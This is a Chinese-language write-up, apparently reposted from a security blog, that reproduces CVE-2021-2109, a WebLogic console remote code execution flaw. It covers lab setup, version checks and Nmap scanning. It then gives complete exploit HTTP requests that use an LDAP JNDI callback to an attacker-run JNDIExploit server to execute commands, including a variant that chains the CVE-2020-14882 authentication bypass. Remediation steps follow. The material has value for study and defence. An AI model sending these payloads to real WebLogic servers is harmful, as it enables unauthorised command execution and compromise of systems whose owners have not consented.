CVE-2021-2109 Weblogic Server远程代码执行漏洞 – 作者:17608406504

0x00 简介

WebLogic是美国甲骨文公司出品的一个application server(应用服务器),确切的说是一个基于JAVAEE架构的中间件,WebLogic主要用于开发、继承、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。

0x01 漏洞概述

CVE-2021-2109是存在于WebLogic Server的console中的一个远程代码执行漏洞,经过身份验证的攻击者可以直接通过JNDI远程执行命令或者注入代码,可以配合CVE-2020-14882未授权漏洞执行任意代码。

0x02 影响版本

WebLogic10.3.6.0.0
WebLogic12.1.3.0.0
WebLogic12.2.1.3.0
WebLogic12.2.1.4.0
WebLogic14.1.1.0.0

0x03 环境搭建

Java环境配置:

一定要安装jdk1.7

jdk1.7下载链接:http://download.oracle.com/otn-pub/java/jdk/7/jdk-7-windows-x64.exe

具体安装步骤可以自行上网搜索,这里推荐 https://www.runoob.com/java/java-environment-setup.html, 里面也有jdk下载的官网地址,安装jdk时安装路径最好全英文无空格,安装完后配置环境变量。

如果不安装jdk1.7,后续配置步骤则会遇到如下错误,

image-20210608012858254.png

安装完Weblogic后打开WebLogic Scripting Tool时可以看到如下报错!image-20210608012831027.png

这是由于我们下载安装的weblogic10.3.6版本最高只支持 jdk1.7,而我们给weblogic配置的是1.8版本,

如果已装有jdk1.7,则直接执行以下步骤,没装jdk1.7但已使用jdk1.8安装了weblogic,则在安装完jdk1.7后执行以下步骤

将weblogic安装目录下C:\Oracle\Middleware\wlserver_10.3\common\bin\commEnv.cmd 文件中的。

@rem Reset JAVA Home
set JAVA_HOME=C:\Java\jdk1.8.0_212
FOR %%i IN ("%JAVA_HOME%") DO SET JAVA_HOME=%%~fsi

修改为

@rem Reset JAVA Home
set JAVA_HOME=C:\Java\jdk1.7.0
FOR %%i IN ("%JAVA_HOME%") DO SET JAVA_HOME=%%~fsi

保存后双击运行即完成配置修改。

安装配置Weblogic Server(Windows):

Weblogic Server下载链接:

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

页面最底下点击下载10.3.6版本(997M),下载完成后将安装程序放到靶机并运行

具体安装和配置步骤参考以下链接,

https://wenku.baidu.com/link?url=SXkEsiMcpfqhM3IdT5ZZ97aNTmwfO_74dvJoNSWoCp2FIyudzpd1uBSgh2ccFJS6N5Kbn0KKPT-KVRkMlsmgRch9YSJ7fDjag1GWxE7cEfy

只需要完成WebLogic安装步骤即可,配置步骤在本次复现中无需进行。

image-20210608004948262.png

启动WebLogic并输入用户名密码

image-20210609231613548.png

访问 http://127.0.0.1:7001/console/登录

image-20210609235951851.png

0x04 漏洞复现

1.本地漏洞检测

1.执行指令查看版本信息

cd/Oracle/Middleware/wlserver_10.3/server/lib
java-cpweblogic.jarweblogic.version

image-20210610212621787.png

没有显示打补丁的信息则存在漏洞

2.使用Nmap进行远程漏洞扫描

可以通过访问控制台登录页 (/console/login/LoginForm.jsp) 看底部版本号,但是该页面很可能被删除或无法访问,此时可以通过Nmap自带的针对WebLogic的扫描脚本来进行版本探测,Nmap会发送T3协议的数据包,并从返回包中的HELO信息获取weblogic的版本.

nmap -n-v-Pn-sV192.168.50.0/24 -p7001,7002 --script=weblogic-t3-info.nse

image-20210610213302432.png

扫描结果显示192.168.50.139目标靶机开启了7001端口的T3协议

同时WebLogic Server的版本为10.3.6,在CVE-2021-2109影响范围内

3.feihong-cs 版EXP

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

下载编译好的jar包后执行指令来启动LDAP和HTTP服务(-i 选项后接本机IP)

java-jarJNDIExploit-v1.11.jar-i192.168.50.139

image-20210610222143639.png

启动后无内容,此时已经打开HTTP和LDAP服务,如果接收到LDAP的请求就会打印出内容并处理,

打开Burpsuite的Repeater模块,填入并修改payload,

POST /console/consolejndi.portal HTTP/1.1
Host: 192.168.50.139:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cookie: ADMINCONSOLESESSION=1w6DgCLLkQhPRBqkQthhQvPqpT4SvTl22rSjK3kRHxw0WHLhnzG1!-766673213
Connection: close
Content-Length: 176
cmd:whoami

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.50;139:1389/Basic/WeblogicEcho;AdminServer%22)

image-20210610221757378.png

点击 Send 发送payload

服务端接收到payload,执行并返回结果

image-20210610024755018.png

image-20210610230536592.png

4.配合使用未授权漏洞

POST /console/css/%252e%252e/consolejndi.portal  HTTP/1.1
Host: 192.168.50.139:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 177
Connection: close

?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.50;139:1389/Basic/WeblogicEcho;AdminServer%22)

image-20210610230851975.png

0x05 修复建议

1.升级Weblogic Server运行环境的JDK版本;

2.禁用T3协议, 进入Weblogic控制台,在base_domain配置页点击“安全”选项卡 -> “筛选器”,配置筛选器,在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s;

3.使用Weblogic Server官方提供的安全补丁进行修复,https://www.oracle.com/security-alerts/cpujan2021.html;

4.临时关闭后台/console/console.portal对外访问;

5.禁止启用IIOP,登陆Weblogic控制台,找到启用IIOP选项,取消勾选并重启.

来源:freebuf.com 2021-06-24 16:53:18 by: 17608406504

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论